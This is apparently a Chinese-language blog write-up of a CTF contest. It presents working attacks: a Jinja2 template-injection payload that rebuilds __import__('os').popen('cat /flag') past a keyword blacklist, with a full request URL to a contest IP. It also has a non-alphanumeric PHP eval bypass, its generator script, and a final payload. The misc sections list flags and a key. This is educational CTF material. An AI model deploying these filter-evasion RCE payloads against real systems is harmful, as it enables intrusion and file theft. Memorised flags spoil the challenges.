别人七夕陪对象过节
我七夕被比赛暴打连妈都不认识
不会吧不会吧,不会真有人七夕打比赛吧
WEB
EASYFLASK
遇见flask就不做的雪殇是屑,结束后看了眼y1ng师傅的wp,再推了一把,啊就这就这?flask就这?
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
app = Flask(__name__)
@app.route("/")
def index():
def safe_jinja(s):
blacklist = ['class', 'attr', 'mro', 'base',
'request', 'session', '+', 'add', 'chr', 'ord', 'redirect', 'url_for', 'config', 'builtins', 'get_flashed_messages', 'get', 'subclasses', 'form', 'cookies', 'headers', '[', ']', '\'', '"', '{}']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag = False
break
return flag
if not request.args.get('name'):
return open(__file__).read()
elif safe_jinja(request.args.get('name')):
name = request.args.get('name')
else:
name = 'wendell'
template = '''
<div class="center-content">
<p>Hello, %s</p>
</div>
<!--flag in /flag-->
<!--python3.8-->
''' % (name)
return render_template_string(template)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000)
确实是原题,就是多了过滤,用globals找eval函数最后rce就行了
{% set xhx = (({ }|select()|string()|list()).pop(24)|string())%} # _
{% set spa = ((app.__doc__|list()).pop(102)|string())%} #空格
{% set pt = ((app.__doc__|list()).pop(320)|string())%} #点
{% set yin = ((app.__doc__|list()).pop(337)|string())%} #单引号
{% set left = ((app.__doc__|list()).pop(264)|string())%} #左括号 (
{% set right = ((app.__doc__|list()).pop(286)|string())%} #右括号)
{% set slas = (y1ng.__init__.__globals__.__repr__()|list()).pop(349)%} #斜线/
{% set bu = dict(buil=aa,tins=dd)|join() %} #builtins
{% set im = dict(imp=aa,ort=dd)|join() %} #import
{% set sy = dict(po=aa,pen=dd)|join() %} #popen
{% set os = dict(o=aa,s=dd)|join() %} #os
{% set ca = dict(ca=aa,t=dd)|join() %} #cat
{% set flg = dict(fl=aa,ag=dd)|join() %} #flag
{% set ev = dict(ev=aa,al=dd)|join() %} #eval
{% set red = dict(re=aa,ad=dd)|join()%} #read
{% set bul = xhx*2~bu~xhx*2 %} #__builtins__
#拼接起来 __import__('os').popen('cat /flag').read()
{% set pld = xhx*2~im~xhx*2~left~yin~os~yin~right~pt~sy~left~yin~ca~spa~slas~flg~yin~right~pt~red~left~right %}
{% for f,v in y1ng.__init__.__globals__.items() %} #globals
{% if f == bul %}
{% for a,b in v.items() %} #builtins
{% if a == ev %} #eval
{{b(pld)}} #eval(pld)
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
我直接抄payload(不会flask不能自己构筑的屑
最后访问
http://183.129.189.60:10025/?name=?{%%20set%20xhx%20=%20(({%20}|select()|string()|list()).pop(24)|string())%}{%%20set%20spa%20=%20((app.__doc__|list()).pop(102)|string())%}{%%20set%20pt%20=%20((app.__doc__|list()).pop(320)|string())%}%20{%%20set%20yin%20=%20((app.__doc__|list()).pop(337)|string())%}{%%20set%20left%20=%20((app.__doc__|list()).pop(264)|string())%}%20{%%20set%20right%20=%20((app.__doc__|list()).pop(286)|string())%}%20{%%20set%20slas%20=%20(y1ng.__init__.__globals__.__repr__()|list()).pop(349)%}%20{%%20set%20bu%20=%20dict(buil=aa,tins=dd)|join()%20%}{%%20set%20im%20=%20dict(imp=aa,ort=dd)|join()%20%}{%%20set%20sy%20=%20dict(po=aa,pen=dd)|join()%20%}{%%20set%20os%20=%20dict(o=aa,s=dd)|join()%20%}%20{%%20set%20ca%20=%20dict(ca=aa,t=dd)|join()%20%}{%%20set%20flg%20=%20dict(fl=aa,ag=dd)|join()%20%}{%%20set%20ev%20=%20dict(ev=aa,al=dd)|join()%20%}%20{%%20set%20red%20=%20dict(re=aa,ad=dd)|join()%}{%%20set%20bul%20=%20xhx*2~bu~xhx*2%20%}{%%20set%20pld%20=%20xhx*2~im~xhx*2~left~yin~os~yin~right~pt~sy~left~yin~ca~spa~slas~flg~yin~right~pt~red~left~right%20%}%20{%%20for%20f,v%20in%20y1ng.__init__.__globals__.items()%20%}{%%20if%20f%20==%20bul%20%}{%%20for%20a,b%20in%20v.items()%20%}{%%20if%20a%20==%20ev%20%}{{b(pld)}}{%%20endif%20%}{%%20endfor%20%}{%%20endif%20%}{%%20endfor%20%}
RECME
<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/im', $code)) {
die('you are not smart');
}
}
eval("echo($code)");
?>
这波,mz超神,
题目思路很简单,blacklist字母数字全过滤了,结尾eval还有点语法错误,正常思路就是构筑为
eval(”echo(1);phpinfo();)//);
然后通过脚本生成即可
a = '$_{'
b = '}.'
c = '!!_'
x = input()
re = ""
shit = ['a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z']
for i in x:
re += a
num = shit.index(i)
for j in range(num):
re += c
if j < num-1:
re+='+'
re += b
print(re)
最终payload为
$_{!!});$_=$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.${!!+!!+!!+!!}.$_{!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!};$__=$_{!!+!!}.$_{!}.${!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.” /”.${!!+!!+!!+!!+!!}.${!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!+!!}.${!}.${!!+!!+!!+!!+!!+!!};$__($___);//
MISC
双 重 图 格
像个傻逼一样对着二维码修了半天,结束为了神大人才知道怎么玩,佛了
神大人的blog:http://www.fzwjscj.xyz/index.php/archives/38/
打开数据表,全局搜索,然后可以发现提示
按照提示插入png内,获得apng一张,在浏览器中打开
获得关键帧
使用在线解密网站获得aes编码
U2FsdGVkX1/mLyhDqehTlmxmPoamVfr7h1El3iWRVvuJQodh1HvxMeQ2F8lgHfXzq70N4U/ZcjYtjLbXE8HRmw==
随后处理jpg,对文件尾进行补齐
获得全新图片
与原二维码进行异或即可解答
获得key:apngisamazing
最后解密:
DASCTF{b12e6674e844486d20d24793809ae38a}
标错的字符
开局直接朝着预期解奔过去了,可惜我不会
预期解就是写脚本批量识别图片,然后与文件名对比
当然非预期更快,直接搜索就完事了
字母为:x9sa5v0
md5加密后获得flag
287fe711b6c25ec4352df516e7f8cc33
暂无评论内容